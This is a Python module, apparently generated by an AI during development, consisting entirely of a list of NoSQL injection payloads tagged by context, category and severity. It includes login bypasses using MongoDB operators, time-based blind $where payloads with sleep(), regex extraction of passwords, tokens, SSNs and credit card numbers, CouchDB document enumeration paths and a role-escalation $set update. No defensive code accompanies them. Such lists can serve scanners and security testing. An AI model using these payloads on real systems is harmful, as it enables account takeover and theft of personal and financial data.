"""nosqli_payloads — generated dev-time by Claude. Webapp module asset.
"""

NOSQLI_PAYLOADS = [{'payload': '{"username": {"$ne": null}, "password": {"$ne": null}}',
  'context': 'json_body',
  'category': 'auth_bypass',
  'severity': 'CRITICAL'},
 {'payload': '{"username": {"$ne": ""}, "password": {"$ne": ""}}',
  'context': 'json_body',
  'category': 'auth_bypass',
  'severity': 'CRITICAL'},
 {'payload': '{"username": {"$gt": ""}, "password": {"$gt": ""}}',
  'context': 'json_body',
  'category': 'auth_bypass',
  'severity': 'CRITICAL'},
 {'payload': '{"username": {"$gte": ""}, "password": {"$gte": ""}}',
  'context': 'json_body',
  'category': 'auth_bypass',
  'severity': 'CRITICAL'},
 {'payload': '{"username": {"$in": ["admin", "administrator", "root"]}, "password": {"$ne": null}}',
  'context': 'json_body',
  'category': 'auth_bypass',
  'severity': 'CRITICAL'},
 {'payload': '{"username": "admin", "password": {"$ne": "wrongpassword"}}',
  'context': 'json_body',
  'category': 'auth_bypass',
  'severity': 'CRITICAL'},
 {'payload': '{"username": "admin", "password": {"$gt": ""}}',
  'context': 'json_body',
  'category': 'auth_bypass',
  'severity': 'CRITICAL'},
 {'payload': '{"username": {"$regex": ".*"}, "password": {"$ne": null}}',
  'context': 'json_body',
  'category': 'auth_bypass',
  'severity': 'CRITICAL'},
 {'payload': '{"username": {"$exists": true}, "password": {"$exists": true}}',
  'context': 'json_body',
  'category': 'auth_bypass',
  'severity': 'CRITICAL'},
 {'payload': '{"username": {"$not": {"$size": 0}}, "password": {"$not": {"$size": 0}}}',
  'context': 'json_body',
  'category': 'auth_bypass',
  'severity': 'HIGH'},
 {'payload': '{"$or": [{"username": "admin"}, {"username": {"$ne": null}}], "password": {"$ne": null}}',
  'context': 'json_body',
  'category': 'auth_bypass',
  'severity': 'CRITICAL'},
 {'payload': '{"username": {"$ne": null}, "password": {"$ne": null}, "$comment": "bypass"}',
  'context': 'json_body',
  'category': 'auth_bypass',
  'severity': 'CRITICAL'},
 {'payload': '{"username": "admin", "$where": "this.password.length > 0"}',
  'context': 'json_body',
  'category': 'auth_bypass',
  'severity': 'CRITICAL'},
 {'payload': '{"username": {"$nin": ["hacker"]}, "password": {"$ne": null}}',
  'context': 'json_body',
  'category': 'auth_bypass',
  'severity': 'HIGH'},
 {'payload': '{"username": "admin", "password": {"$not": {"$eq": "wrong"}}}',
  'context': 'json_body',
  'category': 'auth_bypass',
  'severity': 'CRITICAL'},
 {'payload': '{"username": {"$type": 2}, "password": {"$ne": null}}',
  'context': 'json_body',
  'category': 'auth_bypass',
  'severity': 'HIGH'},
 {'payload': '{"username": {"$ne": "x"}, "password": {"$ne": "x"}, "isAdmin": true}',
  'context': 'json_body',
  'category': 'auth_bypass',
  'severity': 'CRITICAL'},
 {'payload': '{"email": {"$regex": ".*@.*"}, "password": {"$ne": null}}',
  'context': 'json_body',
  'category': 'auth_bypass',
  'severity': 'CRITICAL'},
 {'payload': '{"username": {"$lt": "z"}, "password": {"$lt": "z"}}',
  'context': 'json_body',
  'category': 'auth_bypass',
  'severity': 'HIGH'},
 {'payload': '{"username": {"$lte": "z"}, "password": {"$ne": null}}',
  'context': 'json_body',
  'category': 'auth_bypass',
  'severity': 'HIGH'},
 {'payload': '{"$where": "sleep(5000)"}', 'context': 'json_body', 'category': 'blind', 'severity': 'CRITICAL'},
 {'payload': '{"$where": "function() { sleep(5000); return true; }"}',
  'context': 'json_body',
  'category': 'blind',
  'severity': 'CRITICAL'},
 {'payload': '{"username": "admin", "$where": "sleep(3000)"}',
  'context': 'json_body',
  'category': 'blind',
  'severity': 'CRITICAL'},
 {'payload': '{"$where": "function() { if(this.username == \'admin\') { sleep(5000); } return true; }"}',
  'context': 'json_body',
  'category': 'blind',
  'severity': 'CRITICAL'},
 {'payload': '{"$where": "function() { var d = new Date(); while((new Date())-d < 5000){} return true; }"}',
  'context': 'json_body',
  'category': 'blind',
  'severity': 'CRITICAL'},
 {'payload': '{"$where": "function() { if(this.password.length > 0) { sleep(5000); } return false; }"}',
  'context': 'json_body',
  'category': 'blind',
  'severity': 'CRITICAL'},
 {'payload': '{"$where": "function() { if(this.password[0] == \'a\') { sleep(5000); } return true; }"}',
  'context': 'json_body',
  'category': 'blind',
  'severity': 'CRITICAL'},
 {'payload': '{"$where": "function() { if(this.role == \'admin\') { sleep(5000); } return true; }"}',
  'context': 'json_body',
  'category': 'blind',
  'severity': 'CRITICAL'},
 {'payload': '{"$where": "function() { for(var i=0;i<1000000;i++){} return true; }"}',
  'context': 'json_body',
  'category': 'blind',
  'severity': 'HIGH'},
 {'payload': '{"$where": "function() { if(this.email.match(/admin/)) { sleep(5000); } return true; }"}',
  'context': 'json_body',
  'category': 'blind',
  'severity': 'CRITICAL'},
 {'payload': '{"$where": "function() { if(Object.keys(this).length > 5) { sleep(5000); } return true; }"}',
  'context': 'json_body',
  'category': 'blind',
  'severity': 'HIGH'},
 {'payload': '{"$where": "function() { if(this.password.match(/^a/)) { sleep(4000); } return true; }"}',
  'context': 'json_body',
  'category': 'blind',
  'severity': 'CRITICAL'},
 {'payload': '{"$where": "function() { if(this.isAdmin === true) { sleep(5000); } return true; }"}',
  'context': 'json_body',
  'category': 'blind',
  'severity': 'CRITICAL'},
 {'payload': '{"username": {"$regex": ".*"}, "$where": "sleep(3000)"}',
  'context': 'json_body',
  'category': 'blind',
  'severity': 'CRITICAL'},
 {'payload': '{"$where": "function() { if(this.creditCard != undefined) { sleep(5000); } return true; }"}',
  'context': 'json_body',
  'category': 'blind',
  'severity': 'CRITICAL'},
 {'payload': '{"$where": "function() { if(this.ssn) { sleep(5000); } return true; }"}',
  'context': 'json_body',
  'category': 'blind',
  'severity': 'CRITICAL'},
 {'payload': '{"$where": "function() { if(this.token.length == 32) { sleep(5000); } return true; }"}',
  'context': 'json_body',
  'category': 'blind',
  'severity': 'CRITICAL'},
 {'payload': '{"$where": "function() { try { sleep(5000); } catch(e){} return true; }"}',
  'context': 'json_body',
  'category': 'blind',
  'severity': 'CRITICAL'},
 {'payload': '{"$where": "function() { if(this.password.charCodeAt(0) > 96) { sleep(5000); } return true; }"}',
  'context': 'json_body',
  'category': 'blind',
  'severity': 'CRITICAL'},
 {'payload': '{"$where": "function() { if(db.version().match(/4/)) { sleep(5000); } return true; }"}',
  'context': 'json_body',
  'category': 'blind',
  'severity': 'HIGH'},
 {'payload': '{"username": {"$ne": null}, "$where": "this.username.length > 0 && sleep(3000)"}',
  'context': 'json_body',
  'category': 'blind',
  'severity': 'CRITICAL'},
 {'payload': 'username[$ne]=null&password[$ne]=null',
  'context': 'query_string',
  'category': 'auth_bypass',
  'severity': 'CRITICAL'},
 {'payload': 'username[$gt]=&password[$gt]=',
  'context': 'query_string',
  'category': 'auth_bypass',
  'severity': 'CRITICAL'},
 {'payload': 'username[$ne]=wronguser&password[$ne]=wrongpass',
  'context': 'query_string',
  'category': 'auth_bypass',
  'severity': 'CRITICAL'},
 {'payload': 'username[$regex]=.*&password[$ne]=null',
  'context': 'query_string',
  'category': 'auth_bypass',
  'severity': 'CRITICAL'},
 {'payload': 'username[$exists]=true&password[$exists]=true',
  'context': 'query_string',
  'category': 'auth_bypass',
  'severity': 'HIGH'},
 {'payload': 'filter[$where]=sleep(5000)', 'context': 'query_string', 'category': 'blind', 'severity': 'CRITICAL'},
 {'payload': 'search[$regex]=.*&limit=100', 'context': 'query_string', 'category': 'extract', 'severity': 'HIGH'},
 {'payload': 'id[$ne]=000000000000000000000000', 'context': 'query_string', 'category': 'extract', 'severity': 'HIGH'},
 {'payload': 'role[$ne]=user', 'context': 'query_string', 'category': 'extract', 'severity': 'HIGH'},
 {'payload': 'email[$regex]=^admin&password[$ne]=null',
  'context': 'query_string',
  'category': 'extract',
  'severity': 'CRITICAL'},
 {'payload': 'username%5B%24ne%5D=null&password%5B%24ne%5D=null',
  'context': 'query_string',
  'category': 'auth_bypass',
  'severity': 'CRITICAL'},
 {'payload': 'username%5B%24gt%5D=&password%5B%24gt%5D=',
  'context': 'query_string',
  'category': 'auth_bypass',
  'severity': 'CRITICAL'},
 {'payload': 'username%5B%24regex%5D=.*&password%5B%24ne%5D=null',
  'context': 'query_string',
  'category': 'auth_bypass',
  'severity': 'CRITICAL'},
 {'payload': 'search%5B%24regex%5D=.*%40.*&field=email',
  'context': 'query_string',
  'category': 'extract',
  'severity': 'HIGH'},
 {'payload': 'filter%5B%24where%5D=sleep%285000%29',
  'context': 'query_string',
  'category': 'blind',
  'severity': 'CRITICAL'},
 {'payload': 'username%5B%24exists%5D=true&password%5B%24exists%5D=true',
  'context': 'query_string',
  'category': 'auth_bypass',
  'severity': 'HIGH'},
 {'payload': 'q%5B%24ne%5D=null&sort%5B%24regex%5D=.*',
  'context': 'query_string',
  'category': 'extract',
  'severity': 'HIGH'},
 {'payload': 'id%5B%24gt%5D=0&limit=9999', 'context': 'query_string', 'category': 'extract', 'severity': 'MEDIUM'},
 {'payload': 'token%5B%24regex%5D=%5E%5Ba-f0-9%5D%7B32%7D',
  'context': 'query_string',
  'category': 'extract',
  'severity': 'HIGH'},
 {'payload': 'apikey%5B%24ne%5D=invalid%26role%5B%24ne%5D=user',
  'context': 'query_string',
  'category': 'auth_bypass',
  'severity': 'CRITICAL'},
 {'payload': 'username%5B%24nin%5D%5B0%5D=hacker&password%5B%24ne%5D=null',
  'context': 'query_string',
  'category': 'auth_bypass',
  'severity': 'HIGH'},
 {'payload': '{"user": {"$ne": null}, "pass": {"$ne": null}}',
  'context': 'nested',
  'category': 'auth_bypass',
  'severity': 'CRITICAL'},
 {'payload': '{"query": {"username": {"$ne": null}}}', 'context': 'nested', 'category': 'extract', 'severity': 'HIGH'},
 {'payload': '{"filter": {"email": {"$regex": "^admin"}}}',
  'context': 'nested',
  'category': 'extract',
  'severity': 'HIGH'},
 {'payload': '{"data": {"user": {"$gt": ""}, "pass": {"$gt": ""}}}',
  'context': 'nested',
  'category': 'auth_bypass',
  'severity': 'CRITICAL'},
 {'payload': '{"conditions": {"$where": "sleep(5000)"}}',
  'context': 'nested',
  'category': 'blind',
  'severity': 'CRITICAL'},
 {'payload': '{"search": {"name": {"$regex": ".*"}, "role": {"$ne": "user"}}}',
  'context': 'nested',
  'category': 'extract',
  'severity': 'HIGH'},
 {'payload': '{"criteria": {"_id": {"$ne": null}}}', 'context': 'nested', 'category': 'extract', 'severity': 'MEDIUM'},
 {'payload': '{"match": {"password": {"$regex": "^a"}}}',
  'context': 'nested',
  'category': 'extract',
  'severity': 'HIGH'},
 {'payload': '{"lookup": {"token": {"$exists": true}, "role": {"$ne": "guest"}}}',
  'context': 'nested',
  'category': 'extract',
  'severity': 'HIGH'},
 {'payload': '{"body": {"credentials": {"username": {"$ne": ""}, "password": {"$ne": ""}}}}',
  'context': 'nested',
  'category': 'auth_bypass',
  'severity': 'CRITICAL'},
 {'payload': '{"payload": {"$or": [{"role": "admin"}, {"role": {"$ne": "user"}}]}}',
  'context': 'nested',
  'category': 'extract',
  'severity': 'HIGH'},
 {'payload': '{"request": {"filter": {"$where": "this.isAdmin == true"}}}',
  'context': 'nested',
  'category': 'extract',
  'severity': 'CRITICAL'},
 {'payload': '{"form": {"username": {"$in": ["admin", "root", "superuser"]}, "password": {"$ne": null}}}',
  'context': 'nested',
  'category': 'auth_bypass',
  'severity': 'CRITICAL'},
 {'payload': '{"params": {"id": {"$gt": "000000000000000000000000"}}}',
  'context': 'nested',
  'category': 'extract',
  'severity': 'MEDIUM'},
 {'payload': '{"find": {"email": {"$regex": ".*", "$options": "i"}}}',
  'context': 'nested',
  'category': 'extract',
  'severity': 'HIGH'},
 {'payload': '{"input": {"$and": [{"username": {"$ne": null}}, {"password": {"$ne": null}}]}}',
  'context': 'nested',
  'category': 'auth_bypass',
  'severity': 'CRITICAL'},
 {'payload': '{"meta": {"query": {"$where": "function(){sleep(5000);return true;}"}}}',
  'context': 'nested',
  'category': 'blind',
  'severity': 'CRITICAL'},
 {'payload': '{"nested": {"level1": {"level2": {"$ne": null}}}}',
  'context': 'nested',
  'category': 'extract',
  'severity': 'MEDIUM'},
 {'payload': '{"update": {"$set": {"role": "admin"}}}',
  'context': 'nested',
  'category': 'extract',
  'severity': 'CRITICAL'},
 {'payload': '{"options": {"projection": {"password": 1, "token": 1}}}',
  'context': 'nested',
  'category': 'extract',
  'severity': 'HIGH'},
 {'payload': '{"field": {"$regex": "^[a-zA-Z0-9]{1,20}$"}, "pass": {"$ne": null}}',
  'context': 'nested',
  'category': 'extract',
  'severity': 'HIGH'},
 {'payload': '/_all_docs?include_docs=true', 'context': 'query_string', 'category': 'enum', 'severity': 'HIGH'},
 {'payload': '/_all_docs?startkey="_design/"&endkey="_design0"&include_docs=true',
  'context': 'query_string',
  'category': 'enum',
  'severity': 'HIGH'},
 {'payload': '/_design/app/_view/all?include_docs=true&limit=9999',
  'context': 'query_string',
  'category': 'enum',
  'severity': 'HIGH'},
 {'payload': '/_design/users/_view/all_users', 'context': 'query_string', 'category': 'enum', 'severity': 'HIGH'},
 {'payload': '/_users/_all_docs?include_docs=true',
  'context': 'query_string',
  'category': 'enum',
  'severity': 'CRITICAL'},
 {'payload': '/_design/auth/_show/login', 'context': 'query_string', 'category': 'enum', 'severity': 'HIGH'},
 {'payload': '/_design/app/_list/all/docs', 'context': 'query_string', 'category': 'enum', 'severity': 'HIGH'},
 {'payload': '/_design/main/_update/edit', 'context': 'query_string', 'category': 'enum', 'severity': 'MEDIUM'},
 {'payload': '/_all_docs?limit=100&skip=0&include_docs=true&descending=true',
  'context': 'query_string',
  'category': 'enum',
  'severity': 'HIGH'},
 {'payload': '/_design/security/_view/roles?key="admin"',
  'context': 'query_string',
  'category': 'enum',
  'severity': 'CRITICAL'},
 {'payload': '{"username": {"$ne": null}}', 'context': 'json_body', 'category': 'extract', 'severity': 'HIGH'},
 {'payload': '{"email": {"$regex": ".*"}}', 'context': 'json_body', 'category': 'extract', 'severity': 'HIGH'},
 {'payload': '{"token": {"$exists": true}}', 'context': 'json_body', 'category': 'extract', 'severity': 'HIGH'},
 {'payload': '{"role": {"$in": ["admin", "superadmin", "root"]}}',
  'context': 'json_body',
  'category': 'extract',
  'severity': 'CRITICAL'},
 {'payload': '{"$or": [{"isAdmin": true}, {"role": "admin"}]}',
  'context': 'json_body',
  'category': 'extract',
  'severity': 'CRITICAL'},
 {'payload': '{"password": {"$regex": "^a"}}', 'context': 'json_body', 'category': 'extract', 'severity': 'CRITICAL'},
 {'payload': '{"password": {"$regex": "^p", "$options": ""}}',
  'context': 'json_body',
  'category': 'extract',
  'severity': 'CRITICAL'},
 {'payload': '{"ssn": {"$exists": true, "$ne": null}}',
  'context': 'json_body',
  'category': 'extract',
  'severity': 'CRITICAL'},
 {'payload': '{"creditCard": {"$regex": "^[0-9]{16}"}}',
  'context': 'json_body',
  'category': 'extract',
  'severity': 'CRITICAL'},
 {'payload': '{"$where": "Object.keys(this).join(\',\').indexOf(\'password\') >= 0"}',
  'context': 'json_body',
  'category': 'extract',
  'severity': 'HIGH'},
 {'payload': '{"_id": {"$ne": null}, "__proto__": {"admin": true}}',
  'context': 'json_body',
  'category': 'extract',
  'severity': 'CRITICAL'},
 {'payload': '{"$where": "this.constructor.name == \'Object\'"}',
  'context': 'json_body',
  'category': 'extract',
  'severity': 'MEDIUM'},
 {'payload': '{"username": {"$regex": "^adm"}}', 'context': 'json_body', 'category': 'extract', 'severity': 'HIGH'},
 {'payload': '{"username": {"$regex": ".*", "$options": "i"}}',
  'context': 'json_body',
  'category': 'extract',
  'severity': 'HIGH'},
 {'payload': '{"userId": {"$gt": 0}}', 'context': 'json_body', 'category': 'extract', 'severity': 'MEDIUM'},
 {'payload': '{"age": {"$gte": 0}}', 'context': 'json_body', 'category': 'extract', 'severity': 'MEDIUM'},
 {'payload': '{"$and": [{"password": {"$ne": null}}, {"password": {"$gt": ""}}]}',
  'context': 'json_body',
  'category': 'extract',
  'severity': 'HIGH'},
 {'payload': '{"$nor": [{"role": "guest"}]}', 'context': 'json_body', 'category': 'extract', 'severity': 'HIGH'},
 {'payload': '{"secret": {"$type": "string", "$exists": true}}',
  'context': 'json_body',
  'category': 'extract',
  'severity': 'HIGH'},
 {'payload': '{"$where": "this.password && this.password.length > 5"}',
  'context': 'json_body',
  'category': 'extract',
  'severity': 'HIGH'},
 {'payload': 'username[$regex]=^a&password[$ne]=null',
  'context': 'query_string',
  'category': 'extract',
  'severity': 'HIGH'},
 {'payload': 'token[$exists]=true&token[$ne]=null',
  'context': 'query_string',
  'category': 'extract',
  'severity': 'HIGH'},
 {'payload': 'role[$in][]=admin&role[$in][]=superadmin',
  'context': 'query_string',
  'category': 'extract',
  'severity': 'CRITICAL'},
 {'payload': 'isAdmin[$ne]=false', 'context': 'query_string', 'category': 'auth_bypass', 'severity': 'CRITICAL'},
 {'payload': 'secret[$gt]=', 'context': 'query_string', 'category': 'extract', 'severity': 'HIGH'},
 {'payload': 'ssn[$exists]=true', 'context': 'query_string', 'category': 'extract', 'severity': 'CRITICAL'},
 {'payload': 'email[$regex]=.*%40gmail.com&role[$ne]=null',
  'context': 'query_string',
  'category': 'extract',
  'severity': 'HIGH'},
 {'payload': 'apiKey[$regex]=^[A-Za-z0-9]{40}',
  'context': 'query_string',
  'category': 'extract',
  'severity': 'CRITICAL'},
 {'payload': 'password[$regex]=^[a-f0-9]{32}&username[$ne]=null',
  'context': 'query_string',
  'category': 'extract',
  'severity': 'CRITICAL'},
 {'payload': 'phone[$regex]=^\\+1', 'context': 'query_string', 'category': 'extract', 'severity': 'MEDIUM'},
 {'payload': 'username%5B%24regex%5D=%5Eadm&password%5B%24ne%5D=null',
  'context': 'query_string',
  'category': 'extract',
  'severity': 'HIGH'},
 {'payload': 'token%5B%24exists%5D=true&token%5B%24ne%5D=null',
  'context': 'query_string',
  'category': 'extract',
  'severity': 'HIGH'},
 {'payload': 'isAdmin%5B%24ne%5D=false', 'context': 'query_string', 'category': 'auth_bypass', 'severity': 'CRITICAL'},
 {'payload': 'role%5B%24in%5D%5B%5D=admin&role%5B%24in%5D%5B%5D=superadmin',
  'context': 'query_string',
  'category': 'extract',
  'severity': 'CRITICAL'},
 {'payload': 'secret%5B%24regex%5D=%5E%5Ba-zA-Z0-9%5D%7B1%2C50%7D',
  'context': 'query_string',
  'category': 'extract',
  'severity': 'CRITICAL'},
 {'payload': 'email%5B%24regex%5D=%5Eadmin%40&password%5B%24ne%5D=null',
  'context': 'query_string',
  'category': 'auth_bypass',
  'severity': 'CRITICAL'},
 {'payload': 'ssn%5B%24exists%5D=true&ssn%5B%24ne%5D=null',
  'context': 'query_string',
  'category': 'extract',
  'severity': 'CRITICAL'},
 {'payload': 'creditCard%5B%24regex%5D=%5E4%5B0-9%5D%7B15%7D',
  'context': 'query_string',
  'category': 'extract',
  'severity': 'CRITICAL'},
 {'payload': 'apikey%5B%24ne%5D=null&scope%5B%24regex%5D=admin',
  'context': 'query_string',
  'category': 'auth_bypass',
  'severity': 'CRITICAL'},
 {'payload': '%24where=sleep%285000%29', 'context': 'query_string', 'category': 'blind', 'severity': 'CRITICAL'}]
